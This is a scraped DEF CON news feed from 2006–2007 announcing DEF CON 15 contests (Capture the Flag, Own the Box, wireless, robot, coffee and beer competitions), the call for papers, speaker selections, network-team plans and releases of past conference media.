https://www.defcon.org/defconrss.xml Hey Hey! If you haven't seen it yet check out Hackers on a Plane! 2007 is a very special year for the global hacker community. Thanks to cooperation between the organizers of DefCon XV and the Chaos Communications Camp 2007, the two largest gatherings of hackers from around the world happen only a few days apart! This is where "Hackers on a Plane" comes in: The Hacker Foundation has put together a complete travel package to help bring together hackers from around the world for ten days of fun, culture and community. We see it as the first step to building a truly global hacker community. $1,337.00 (for those travelling roundtrip from the US & Canada) 1,337.00 (for those travelling roundtrip from Europe) Gets you: * Admission to DefCon in Las Vegas, NV, USA * Flight from Las Vegas to Frankfurt * Flight on the "Hackers on a Plane" charter flight from Frankfurt to Finow Airport * Admission to all days of CCCamp2007 * Accommodation at Camp Anaconda (no need to bring a tent!) * Return flight to select destinations in the USA (or flight to Las Vegas for DefCon for EU citizens.) More info at Hackers on a Plane! Link: http://hackersonaplane.info/info.html

==> LosT @ Con Mystery Box Challenge - Official Registration Open!

https://www.defcon.org/defconrss.xml mysterychallenge.org Official registration is open. To Register Teams must send an email to: Defcon15MysteryChallenge ]at[ mysterychallenge [dot] org -Teams are limited to 5 official members -You must receive a confirmation that your team is registered or you are NOT -You must submit a team name and list team members -Teams successful in completing the challenge last year are guaranteed a spot if registered by June 17. -New teams are encouraged to enter, however only those serious about completing the challenge -The challenge will take longer to complete this year Questions? Post here. Comments? Post here. New teams trying to decide if you have what it takes to compete? Post here (I encourage those who competed last year to answer these types of questions...) Link: https://forum.defcon.org/showthread.php?t=8509

==> NEW CONTEST! 0wn the box? Own the box!

https://www.defcon.org/defconrss.xml From ownthebox.cipherpunx.org/: Are you a defensive ninja? Are your services unbreakable, your builds airtight? Do your countermeasures have countermeasures for counter-countermeasures? So prove it, bucko... Bet your box on it, on the most hostile network in the world. Bring your laptop/server/desktop, hardened to the nines, running exactly two (2) visible services, to our specs, and we'll offer you up for the slaughter. The first person to compromise you walks away with your gear. When you're 0wned, you're owned. It's that simple. The last box(en) standing, unowned, wins, and the winner(s) can take his/her precious back home, safe in the knowledge that if it survived at DC, it can survive anywhere. For the other side of the fence, the reward is clear... Pick your target, 0wn the box, and own the box. A shopping spree for the elite. Link: https://forum.defcon.org/forumdisplay.php?f=337 Contest Site: http://ownthebox.cipherpunx.org/ Be sure to check the forums often it looks like they have already started to collect an interesting list of hardware up for the slaughter! Mwahahaha!

==> Announcing The DefCon 15 Wireless Contest

https://www.defcon.org/defconrss.xml Announcing The DefCon 15 Wireless Contest (queue Thus Spake Zathrustra) Are you a freq-geek? Think your WiFiFu is hot? Get high from sniffing packets on the ether? Think you're a great lover? We can't help you with the last one, but get ready because here's your chance to prove the rest of those outlandish claims to the world. Compete in the Wireless Contest, and we can validate you self esteem, at least in the geeky stuff. The Wireless Contest, following the format for the past few years, will be a series of "Mini-Contests". You can compete in only a single mini-contest or all of them. We recommend that teams be formed to fill in different skill areas. We are allowing a unlimited number of Teams -subject to resources- limited to 3 people each. First Place winners of individual mini-contests events get prizes and with a top prize will be awarded for the best overall of the contests. A common problem with the Wireless Contest in the last few years, is that some potential competitors felt that they didn't have the skills to even try. As a result, fewer competitors kept signing up. To elevate this, the Wireless contest this year is tied in heavily with the Wireless Village. If you want to compete in the contest, but feel you don't have a needed skill, you can come to the Wireless Village before a mini-contest and learn the needed skill at the one of the Wireless Village's world-famous Breakout Sessions. You walk in having no skills but a willingness to learn, learn a skill in an exciting breakout session taught by an expert, then go out and compete and the beat the pants at those loudmouth teams who said they'd pwn you. Learn + Touch = DO! link: https://forum.defcon.org/forumdisplay.php?f=309

==> CTF Qualifications Are Complete!

https://www.defcon.org/defconrss.xml From invisigoth: The qualification round for this years CTF is complete. More than 150 teams were actually submitting answers which means that participation for this year was more than double the previous high water mark (as far as we're aware). Results may be found at http://www.kenshoto.com/ as always. This years challenges came in a wide range of technologies and difficulties. No single team actually solved them all... Additionally, this years level of international participation was staggering... The MUD for this year will remain up for teams to ask questions and hopefully collaborate with each other about how they came to solutions for some of the harder challenges. Additionally, we will be putting most if not all of the challenges back online for a while so everybody can sharpen up... Stay tuned...

==> DEFCON 15 Network Team has two slots left!

https://www.defcon.org/defconrss.xml From the site defconnetworking.org: "DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC." TWO SLOTS LEFT! To get an Idea check out last years network: Here are the PPT slides from DC14 Closing Ceremonies with all the net stats: DC14network.ppt http://www.defconnetworking.org/dc14network.ppt Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. About Defcon Networking: We're the group of volunteers who run the network at DEFCON. It's our job to design, plan, architect, implement, and secure the show network. We arrange bandwidth, we handle wireless, we provide secure connections for show staff, speakers, and press. Finally, we provide an environment where DefCon Attendees can share and be creative.

==> DEFCON 15 Speakers Selected!

https://www.defcon.org/defconrss.xml New speakers have been selected for DEFCON 15! Check out their abstracts and bios online now. The Schedule is not yet finished and we still have room for a few more talks! So don't get discouraged, submit your rootfu now! Speaker page: http://www.defcon.org/html/defcon-15/dc-15-speakers.html New Speakers selected: Squidly1, aka Theresa Verity, Thinking Outside the Console (box) Brendan O'Connor, Greater than 1:Defeating "strong" Authentication in Web Applications. Kenneth Geers, Greetz from Room 101 Peter Berghammer (pf0t0n), A Journalist's Perspective on Security Research. Schuyler Towne, Locksport: An Emerging Subculture Many more are online, check back often, the DEFCON 15 Schedule will be online shortly!

==> DEFCON 15 CFP Closing soon

https://www.defcon.org/defconrss.xml The DEFCON 15 CFP will be Closing June 15th! Please submit your rootfu to talks@defcon.org. We have been making selections and we are pleased to have accepted some really great speakers. There is still room to squeeze in a few more exceptional talks. Submit now, there will be no extensions possible! Submit: https://www.defcon.org/html/defcon-15/dc-15-cfp.html New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! If you have an IDEA please submit it, talks@defcon.org!

==> Amateur CTF Registration now OPEN!

https://www.defcon.org/defconrss.xml Registration for this years aCTF is officially open! Registration page: http://www.dc949.org/aCTFIII/register.php >From Contest Organizers: "We're recommending that you group yourselves in teams of three, as the prizes will come in triplicate. There will be prizes for win, place and show. We have some really good stuff in the works in terms of prizes, but I'm not going to mention them here since they're not bought and in our hands (and/or built)" For a little more information about the setup this year. http://www.dc949.org/aCTFIII/README.php

==> Announcing Official DC949 aCTF Artwork Contest!

https://www.defcon.org/defconrss.xml Official DC949 aCTF Artwork Contest The winners artwork will be made into an 8x4 foot vinyl sign. Besides bragging rights, the winner will also receive yet to be determined prize. Rules 1. The contest will remain open for a minimum of 1 week, and will remain open until a winner is chosen. 2. Submissions must be have a 2x1 or 1x2 ratio with a minimum resolution of 2000x1000 pixels. 3. Artwork must contain simplistic designs and colors. ie designs with definitive edges and no fading or merging colors. 4. Maximum number of colors that can be used is 4. 5. Artwork must contain "DC949" and "aCTF" in some legible form. Submissions must contain a .PNG, .JPG, or .GIF of the artwork as well as in a vector format. (.PSD, .EPS, etc) Please email submissions to cp-at-dc949-dot-org Forums discussion is here: https://forum.defcon.org/showthread.php?t=8456 Don't forget to use your talents to enter into the DEFCON 15 Artwok Contest too! DEFCON 15 Artwork Contest Guidelines http://www.defcon.org/html/defcon-15/dc-15-forms/DC15-Artwork-Contest-Gu idelines.pdf Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org Categories: Web Banner Key Card T-shirt Wallpaper Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con),$50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> DEFCON 15 Network Team in Effect!

https://www.defcon.org/defconrss.xml As DC 15 gets closer all goon teams are powering up! Ever wonder what the network team is up to? Ever wanted to sniff the con traffic feed? Check out the defconnetworking.org! Lockheed throws down some defcon history and gets us ready for more! >From the site: DC15 Network 15MAY07 DefCon presents a really unique opportunity. You know how hostile the environment is. Have you ever wondered what that traffic looks like? All you need do is ask. For years we've provided people the ability to plug in a capture/sniffer box and capture public con traffic to take back to your Evil Laboratory(tm) for analysis after con (you know, once you've sobered up & stuff). If you want in on the action, email us so we can RSVP a spot for you on our Table-of-Doom in the NOC. 11MAY07 Why yes, we are in the midst of planning for DC15. Now that we've "done the dance" with the hotel (who are awesome folks, btw!) we know what we can and can't do and should have virtually no surprizes this year. We're planning higher bandwidth, better monitoring, and also some new interactive-type stuff (I hesitate speaking of it for fear of jinxing it!). We're actually spending our funds boosting up our own infrastructure (beyond the Arbua kit we have) so we have more ports, better fibre connectivity, better trunking. Remember, if you're planning anything "special", have specific needs for your talk, for your demo, for your break-out session, let us know EARLY so we can plan for it. --Lock

==> Announcing Amateur CtF 3 by DCG 949!

https://www.defcon.org/defconrss.xml From the official web site for the Amateur CtF: aCTF 3 "King of the Hill" Yes, it's official; we'll back again this year. The first year, nobody scored, the wifi network we set up had massive problems, but people seemed to have a little fun and see the potential. Last year, the network was stable, people scored, battled back and forth, and we were actually able to give out some prizes. There was some trouble with boxes staying up, but overall it was a huge success. Last year we saw some things that surprised us. There was a case of two teams which both could take a flag, but neither could lock the other out. They both then proceeded to write scripts to play the game for them. Yeah, it then made the server inaccessible due to the massive amounts of requests, but still... hats off to both of you. We didn't expect automated hacking. We also learned that while Windows NT might have worked in our little test environment, it really can't hold up to the brutality of a Defcon contest. I'm happy to say that Windows NT will not be appearing in this year's contest. We will be changing a few things around this year, but the basics will be the same as before. Find a flag, find a way to put your team name on it, and you'll score points for as long as you can keep your flag up there. As usual, details on the contest will be limited, however we will say that we're branching out a bit more this year. Hacking isn't just about buffer overflows and running metasploit, it's really about one upping someone (or everyone) else. It's about figuring out how things work and taking them apart and putting them back together to do something different, customizing things to make them do things they were never intended to do, and just generally learning how to beat the system.

==> Announcing DefConBots Contest!

https://www.defcon.org/defconrss.xml Kallahar has updated the software page for the DefConBots Contest. "Improvements over last year include faster response times and software alignment of the camera to where the gun is actually shooting. All the code is public domain, do whatever you want with it!" What is the point of the contest you ask? Quite simple it is to ceate a computer controlled gun that can shoot down targets in a shooting gallery. See http://defconbots.org/ for complete contest information.

==> NEW CONTEST! Guitar Hero II

https://www.defcon.org/defconrss.xml Guitar Hero II Contest!! A new contest at Defcon 15: Are you a Guitar Hero? Do your friends think you're l33t and can shred like a rock star? Then prove it! Contest Site: http://www.panadero.org/gh_home.html Forums discussion: https://forum.defcon.org/forumdisplay.php?f=335 Guitar Hero II - DEFCON STYLE!!!! Why Not!!! Rules (cause they tell us we have to have them...) * The contest will consist of 3 levels of play, Medium, Hard and Expert. * The contest will be played on Guitar Hero II, on the Xbox 360. * A initial pre qualification round will be held so that Experts aren't playing in the Medium level, etc...details of the prequals to come... * All contestants should be at their assigned time to play 10 minutes before their time. There will be some leeway if you are a few minutes late, but don't expect to get your turn if you show up hungover an hour after your time. * You may use your own guitar, as long as it has not been modified, and is for Xbox 360. * Free play is a chance for people that have never played Guitar Hero to have a chance. It's not a chance for contestants to practice. This contest is for everyone, and we want to make sure that is the case. Free play will be limited to one song per person, depending on how many are waiting to play. Scoring * The 'prequals' will be designed to ensure that Experts are not playing in the Medium category, just to win. We want the game to be fair, and everyone to have fun. We would hate for the lesser/newer players to be upset and frustrated because it's dominated by those that have years of practice. * The 'heats' are designed to weed out the newbs from the Guitar Heroes. Each player will play 2 songs, back to back, to come up with a cumulative high score. * The four highest scores will move to the finals for each level. * The finals will be tournament style, head to head, most points win and move to the final song. * The final two players for each level will play against each other to become the first annual Defcon Guitar Hero champion! * It is VERY important to pick the right songs to get into the finals. Some songs have more notes, for more Star Power and higher points, as some songs have less notes. * All songs in the finals will be chosen by the event coordinators and will not be announced until the start of the finals. Final songs will not be songs included in Xbox Live downloadable content, so that no player has an advantage over others, GOOD LUCK! Defcon STAR POWER!!! Do you want an extra 1000 points added on to your song??? Do ya? Bring me a COLD unopened beer! I won't accept it if it's opened (no date rape drugs for the contest organizers!) Any beer, except for Guinness, you get an extra 1000 points of Star Power! Keep in mind that 6-packs are appreciated, but it will still only get you 1000 points! I love beer, but it's not fair to bring a case of beer and get an extra 12000 points!

==> Toxic BBQ contests and events!!

https://www.defcon.org/defconrss.xml Once again, the Toxic BBQ is looking for a slogan. Something catchy, something creative. It will be used on the front of the Toxic BBQ T-Shirts. Last year was ASTCells slogan "If its dead we cook it" "If its alive we cook it" " ... a little longer." Submit your ideas. https://forum.defcon.org/showthread.php?p=86581#post86581 Come on, It's not that hard. Toxic BBQ IV Events and Contests: Iron Chef I Time: To Be Announced Contact: Deviant Ollam Event Desc: Contestants in teams of 3 or less will race to cook and present a dish made from an ingredient revealed to them at the start of the contest. After a timed preperation period, the dishes will be awarded points by a panel of judges who will judge for Presentation, Uniqueness, and Flavor! For more info on the Toxic BBQ go here: http://www.toxicbbq.com/ Forums discussion: https://forum.defcon.org/forumdisplay.php?f=308

==> Announcing CoffeeWars VIII: Pre-Con Ranting

https://www.defcon.org/defconrss.xml The Coffee Wars Crew is getting ready for their Call for Beans! >From the website: Wake up and smell the coffee war, people: DefCon 15 is just around the corner, and that means another edition of the world's best-known hacker coffee competition. Already, the frenzy has begun! Now's the time when you have an All-Inclusive Divine Excuse to unashamedly mingle with your own kind without having to shroud your activities under the shadow of the Evil Corporate Coffee Empire! Yes, now we caffeine fiends can gather without shame! WHAT? You want a shot of espresso?! We got your shot right here, pal. This event ain't no freebie. If you want a cup, you gotta pony up. Coffee, that is. Whole bean. We're judging it all. The best, the strongest, the most caffeinated. You name it. ...but regular store-bought or corporate coffee trash will only earn a trashing. You think you got what it takes? Then we'll take what you got! Bring your best beans and put 'em up for judgment by our over-qualified, over-caffeinated, (and over-rated) Coffee Wars judges and contestant panel! We keep hearing that someone else's beans are the best. Now it's time to prove it bean-to-bean! Forums discussion is here: https://forum.defcon.org/forumdisplay.php?f=284

==> Announcing LosT @ Con Mystery Box Challenge!

https://www.defcon.org/defconrss.xml The idea is simple.. form a team, get a box, open box. But is it that simple? The box is a mystery, with many puzzles involved in opening it. To get things going for this year Lost Boy has started to accept team sign ups, as well as release clues to hint at some of the puzzles involved. Here is a picture on how NOT to open a mystery box: https://pics.defcon.org/showphoto.php?photo=153 For a bit on the last challenge check CNet's coverage here: http://news.com.com/2300-1029_3-6102806-5.html Interested? Check out the thread on the challenge over on the forums.

==> Capture the Flag Contest Announced!

https://www.defcon.org/defconrss.xml Capture the Flag at DEFCON continues it's long tradition with the announcement by Kenshoto of the CtF qualification round! >From their announcement: Kenshoto's army of code-gnomes has been working feverishly on the production of this years installment of WarGamez (CTF), more to come here yet tonight, but we'll be making the quals announcement *very* soon. Check it: Dr. Kenneth Shoto proudly announces that the qualifying round for the Defcon Capture the Flag contest is now pen for registration. The qualifying contest will start at 1 June 2007 @ 2200 EST and end 3 June 2007 @ 2200 EST. Teams can be any size you'd like (more ninjas clearly == better) and each team will need to register before 1 June 2007 @ 2200 EST in order to get an account for the actual game. The top 7 teams qualify for a seat at the table at the proverbial 'big show' (the actual CtF competition) to be held at Defcon 15. Defcon takes place August 3-5th 2007 (https://www.defcon.org/) so make sure you clear all those WoW, D&D, and Eve-Online play dates off your calendar early. That's right hackers and hackettes, get your debuggers warmed up and your shellcode tested, cuz it's that time of year again. What you say? You don't know what the bleep we're talking about? Well, peep dis: The core of the qualifying competition will be a quiz-like interface where each team may select a question and then must hack until they can answer it. Topics will vary widely, but of course include such fan-favorites as reversing martian binaries, landing shellcode and a double lutz simultaneously, and stealing information from strange places. We've also thrown in challenges like intar-webs hax0rification and mind-bendy trivia so the 5kr1p+ K1dd1e5 can play along (much love). This year the game allows for maximum parallelization on questions. When the leading team selects a question, that question (and all the ones they already answered) becomes available to the trailing teams. In other words, there is no need to register multiple ghost accounts as they won't give any advantage (*ahem*skewl*cough)... Don't have the stones to think you can win? Well, you should sign-up and play anyway. The winning team from last year actually got primed up for the game by competing in quals. They then kicked it up a notch by spending the next three months figuring out every detail of every challenge we put out there and explaining it all as if paid to do so (check it out http://nopsr.us/ctf2006prequal/). Besides, how else are you gonna sharpen those skillz and convert yourself from poser to p3wner? So what are you waiting for? Jump onto your nops-sled and slide over to http://kenshoto.allyourboxarebelongto.us:1337/ to sign up for quals now... -kenshoto (ctf07 at kenshoto.com)

==> Announcing the Art Work Contest!

https://www.defcon.org/defconrss.xml DEFCON 15 Artwork Contest Guidelines DEFCONDEFCON Submission deadline: All submissions must be received by June 25, 2007. Submit all entries to: sleestak\at\defcon dot org What we will do with your artwork: Art contests submissions will be added on-line to the DEFCON web site and may be included in the con program. By submitting artwork us, you are allowing DEFCON to publish and reproduce your artwork in electronic and print formats. Categories: Web Banner Key Card T-shirt Wallpaper Required Elements: Artwork should incorporate a version of the following text: DEFCON / DefCon / Def Con with the number 15 / 2007 / Fifteen / 0x0F / XV / etc.. you get the point. It ties DEF CON to the year of the con. Artwork Preparation Specs: All continuous tone artwork must be at least 600dpi The following formats are accepted for artwork: - .EPS with Vector preferred, all fonts converted to outline - .Jpg - .Gif - .Psd - layers with all fonts converted to outline ***We strongly recommend Illustrator Vector artwork for any submissions for the T-shirt or Key Card categories since these will need to be reproduced in print. Prizes: 1. Winners will be contacted individually and be announced on the website and recognized in the DEFCON 15 printed program. 2. There may be multiple winners per category. 3. DEFCON reserves the right to not select a winner for every category Banner Art Prize: - The first place winner will receive free admission to DEFCON 15 for one person (non-transferable to a future con),$50 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. T-Shirt Art Prize: Free admission to DEFCON 15 for two persons, $130 credit that may be used at the official DEFCON SWAG Store and recognition in the con program and website. Wallpaper Art Prize: Free admission to the conference for one person, $50 credit that may be used at the official DEFCON SWAG Store

==> Announcing Brew Wars!

https://www.defcon.org/defconrss.xml Announcing Brew Wars for DC 15! It's time to remind everyone of Brew Wars again. The very first Brew Wars will happen this year at Defcon 15. The rules are simple. Just bring twenty four ounces of your home brew to Defcon. A judging panel of three people, including myself, will drink and rate each brew. The beer will be rated on a scale of 1-10. Each beer will be judged in it's catergory. The standard of each category of beer is last year's winner of the Great American Beer Festival in the style you have entered. A list of those winning beers can be found at the URL below. http://www.beertown.org/events/gabf/...medalists.aspx The judges will be blind tasting the beers. The only information given to the judges will be what style of beer it is. Judges will not be allowed to enter their own brews. Judges have already been selected. All judges are were at the GABF and sampled all winning brews. Extensive tasting notes were taken at the time. I have sourced a glass carboy for the winner. This carboy will be etched will a logo commemorating the event. If your beer is good enough, you could soon be brewing your next batch in a unique carboy. Dr. Faustus

==> Robot Wars Arena Updated!

https://www.defcon.org/defconrss.xml Arena Updated! We've started building the new arena for this year's robot contest. The details about the arena and the build photos are here: http://defconbots.org/defcon15/arena.php So now that it's (almost) done, teams are invited to come practice on the actual arena if you want to get yourself to Orange County, CA :) If anyone has questions or if you need more detailed photos, please let me know! Kallahar

==> Contests starting up for DEFCON 15!

https://www.defcon.org/defconrss.xml DEFCON 15 Contests are starting to get organized! Interested in running a contest or competing in one? Check out the current list of what's happening over on the forums. Capture the Flag is back in full force, the Toxic BBQ is in effect, the Black and White Ball will happen as usual, and a whole host of new contests are getting ready. Some of them include: - The Amateur CtF - Beverage Cooling Contest - Brew Wars! - Coffee Wars - DefconBots Robot Contest - Hacker Jeopardy - Lockpicking Contest - LosT @ Con Mystery Challenge - QueerCon - Spot the Fed -The Summit meeting and party - Sushicon - Wireless Village, Lockpick Village and RFID village! - Sekret Challenge!

==> DEFCON 15 CFP Now Open!!

https://www.defcon.org/defconrss.xml DEFCON 15 Call For Papers is now officially Open and will close on June 15, 2007. Don't know what DEFCON is? Go to https://www.defcon.org/ and clue up! Papers and presentations are now being accepted for DEFCON 15, the conference your mother and ISC(2) warned you about. DEFCON will take place at the Riviera in Las Vegas, NV, USA, August 3-5, 2007. Last year, we eliminated speaking tracks, and we received a diverse selection of submissions. From hacking your car, your brain, and CIA sculptures to hacking the vote, Bluetooth, and DNS hacks. We group presentations by subject and come up with topic areas of interest. It worked out so well in the past we are doing it again. What are we looking for then, if we don't have tracks? Were looking for the presentation that you've never seen before and have always wanted to see. We are looking for the presentation that the attendees wouldn't ask for, but blows their minds when they see it. We want strange demos of Personal GPS jammers, RFID zappers, and HERF madness. Got a MITM attack against cell phones? We want to see it. Subjects that we have traditionally covered in the past, and will continue to accept include: Trojan development, worms, malware, intelligent agents, protocol exploits, application security, web security, database hacking, privacy issues, criminal law, civil law, international law/treaties, prosecution perspectives, 802.11X, bluetooth, cellular telephony protocols, privacy, identity theft, identity creation, fraud, social implications of technology, media/film presentations, firmware hacking, hardware hacking, embedded systems hacking, smartcard technologies, credit card and financial instrument technologies, surveillance, counter-surveillance, UFO's, peer2peer technologies, reputation systems, copyright infringement and anti-copyright infringement enforcement technologies, critical infrastructure issues, physical security, social engineering, academic security research, PDA and cell phone security, EMP/HERF weaponry, TEMPEST technologies, corporate espionage, IDS evasion. What a mouth full! Well you can't say we didn't give you some ideas. This list is not intended to limit possible topics, merely to give examples of topics that have interested us in the past, and is in fact the same list we used last year.. Check out https://www.defcon.org/html/defcon-14/dc-14-speakers.html for past conference presentations to get a complete list of past topics that were accepted if you want to learn from the past. We are looking for and give preference to: unique research, new tool releases, day attacks (with responsible disclosure), highly technical material, social commentaries, and ground breaking material of any kind. Want to screen a new hacking documentary or release research? Consider DEFCON. Speaking Formats: Choose between 12 hundred seconds, 50 minutes, 110 minutes, or a break out format of a length you determine. We are continuing the Twelve Hundred Second Spotlight, which is a shorter presentation (about twenty minutes) that doesn't warrant a full 50 or 110 minute talk. The Twelve Hundred Second Spotlight is designed for those who don't have enough material for a full talk, but still have a valuable contribution to make. This is to ensure that great ideas that can be presented quickly don't fall through the cracks merely because they didn't justify a full length talk. Examples include research, announcements, group presentations, projects needing volunteers or testers, requests for comments, updates on previously given talks, quick demonstrations. You get the idea. Presenters will get a speaker badge which entitles them to free admittance to DEFCON, but we will be unable to pay an Honorarium. Remember being attacked by flying meat? Do you remember thick accented Germans trying to convince you to attack critical infrastructure? Do you remember extravagant vapor ware releases by a stage filled with posses? We do, and sans projectiles of raw meat we want to encourage such shenanigans again this year. We are calling on all "hacker groups" (you know who you are, and the FBI has a nifty file with your name on it) to present at DEFCON, to discuss what you're up to, what your mission is, to discuss any upcoming or past projects, and to discuss parties/conferences you are throwing. We do humbly request that all gang warfare be relegated to electronic attacks, and not fall over into meat space. New for DEFCON 15: The second year being at the Riviera has allowed us to make some changes to the format from last year. We have more speaking rooms, and because of this I want to announce a call for workshops, demos, and mini trainings. We have additional small rooms that will enable highly focused demonstrations or workshops. If you want to talk about building a passport cloner or a tutorial on developing Metasploit exploits this might be the format for you. You tell us how much time you need, and we try to accommodate you! To submit a speech Complete the Call for Papers Form at: https://www.defcon.org/html/defcon-15/dc-15-cfp-form.html and send to talks at defcon dot org. You will receive a confirmation within 48 hours of submission. We are going to continue last year's goal of increasing the quality of the talks by screening people and topics. I realize you guys are speaking for basically free, but some talks are better than others. Some people put in a bit more effort than others. I want to reward the people who do the work by making sure there is room for them. This year we will have two rounds of speaker acceptance. In the first round we will fill about half of the schedule before the submission deadline, and the remaining half afterwards. This is to encourage people to submit as early as possible and allows attendees to plan on the topics that interest them. If you see the schedule on-line start to fill, do not worry if you have not heard from us yet, as we are still in the process of selection. Barring a disaster of monstrous proportions, speaker selection will be completed no later July 1. The sooner you submit the better chance you have of the reviewers to give your presentation the full consideration it warrants. If you wait until the last minute to submit, you have less of a chance of being selected. After a completed CFP form is received, speakers will be contacted if there are any questions about their presentations. If your talk is accepted you can continue to modify and evolve it up until the last minute, but don't deviate from your accepted presentation. We will mail you with information on deadlines for when we need your presentation, to be burnt on the CDROM, as well as information for the printed program. Speakers get in to the show free, get paid (AFTER they give a good presentation!), get a coolio badge, and people like you more. Heck, most people find it is a great way to meet people or find other people interested in their topics. Speakers can opt to forgo their payment and instead receive three human badges that they can give to their friends, sell to strangers, or hold onto as timeless mementoes. Receiving badges instead of checks has been a popular option for those insisting on maintaining their anonymity. Please visit: https://www.defcon.org/ for previous conference archives, information, and speeches. Updated announcements will be posted to news groups, security mailing lists and this web site. https://forum.defcon.org/ for a look at all the events and contests being planned for DEFCON 15. Join in on the action. https://pics.defcon.org/ to upload all your past DEFCON pictures. We store the pictures so you don't have to worry about web space. If you have an account on the forums, you have an account here. https://www.defcon.org/defconrss.xml for news and announcements surrounding DEFCON. CFP forms and questions should get mailed to: talks/at/defcon.org

==> CSI: TCP/IP by Robin Mejia at wired.com

https://www.defcon.org/defconrss.xml "Keep your friends close and your enemies closer. Why the Pentagon's toughest Internet crime fighter likes hanging out with blackhat hackers" is the sub title of the article. DEFCON It turns out to be a well written piece about Jim Christy's career and the birth of the DoD Cybercrime Center. It is set to a back drop of DEF CON 14, and has a couple funny bits, some interesting war stories plus a quote from me. A snip from the article: "Christy points out a pulsing vein in the guy's neck suggesting it's a sign he is lying. The guy calls Christy an old man. He hints that maybe he might have some small connection to Mossad. As he finally sits down, Christy passes him a business card."

==> Don't Be a Slacker, DEFCON 15 WANTS YOU!

https://www.defcon.org/defconrss.xml Starting March 1st we will be opening the call for papers for DEFCON 15 - the annual gathering of subversive computer folks. Earlier submissions are given higher priority, so prepare your best kung-foo, and send it our way. Remember, we are always looking for original and highly technical content, unusual subject matters, software releases, innovative hardware hacking, and generally mind-blowing content. Check out past convention archives to get an idea of what we are talking about. Once the date is closer there will be more specifics.. I just wanted to give everyone a heads up!

==> DEFCON 14 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions. The new media server will be going on-line in the next month, and because the old media server is out of drive space you will notice that all DC 7 content has been taken off line to make room. Once the new media server is on-line all past content will be restored!

==> DEFCON 14 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-14 encoded for download. This marks the third step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> Happy Holidays!

https://www.defcon.org/defconrss.xml Happy Holidays from all of us here at Defcon! We would like to wish you the best this Holiday season. We hope you have plenty of family, food and fun to go around. If you get bored you can always gather the family around the warm glow of your flat screen to watch the ghosts of presentations past. There is no better gift than that. Unless of course your loved ones headed over to Jinx and got you some sweet Defcon gear! We also wanted to remind you that pics.defcon.org is up and running, we are looking forward to seeing it grow with the new year. If you get together with your fellow hackers this holiday season, or mod that must have Christmas gift, feel free to upload your photos in the members and dc groups galleries. That said, Eat plenty of other peoples food, stay up late with your new shiny toys and have fun with friends and family. See you next year!

==> DEFCON 14 Presentations On-Line!

https://www.defcon.org/defconrss.xml We've gotten in some updated presentations, and have updated www.defcon.org to make them all available. So if you want to see the slides to a preso you missed, check out the link below. DEFCON Next up we'll be posting the audio and video from DC-14 for download.. DEF CON's XMas present to the community, coming in December.

==> pics.defcon.org now live!

https://www.defcon.org/defconrss.xml pics.defcon.org is now live for use. DEFCONDEFCON What is it you ask? Think of it as a repository for all pictures related to DEF CON. It is a place you can upload your pictures and arrange them however you want. Others can comment on them, vote, or put them in their own favorites album. The idea is that as people change providers there is no long term repository for DEF CON pictures except to the links www.defconpics.org points to. Because they don't mirror the content I wanted to create a free place for people to share their pictures that won't change or go down. The pics software is integrated with the defcon forums, so if you already have an account there you automatically have an account on pics.defcon.org. So get busy! Upload those pictures. both http and https connections work. Spread the word!

==> DEFCON 12 Audio now available!

https://www.defcon.org/defconrss.xml DEFCON has released the first batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 12 Video now available!

https://www.defcon.org/defconrss.xml DEFCON has released the second batch of content from DC-12 encoded for download. This marks the second step of moving away from the real media server to a direct download model in an effort to spread far and wide the presentations from past DEFCON conventions.

==> DEFCON 13 Videos of the Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml Here are the music videos of the music from the Black and White Ball at DEFCON 13. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 13 Music from the Black and White ball now on-line!

https://www.defcon.org/defconrss.xml We took the audio .wav files and encoded them into .mp3 files. DJs include Wintamute, Ms. Jackalope, Shatter, Kris Klink and Casey with the bands Catharisis and Regenerator in the house!

==> DEFCON 14 Speakers Selected!

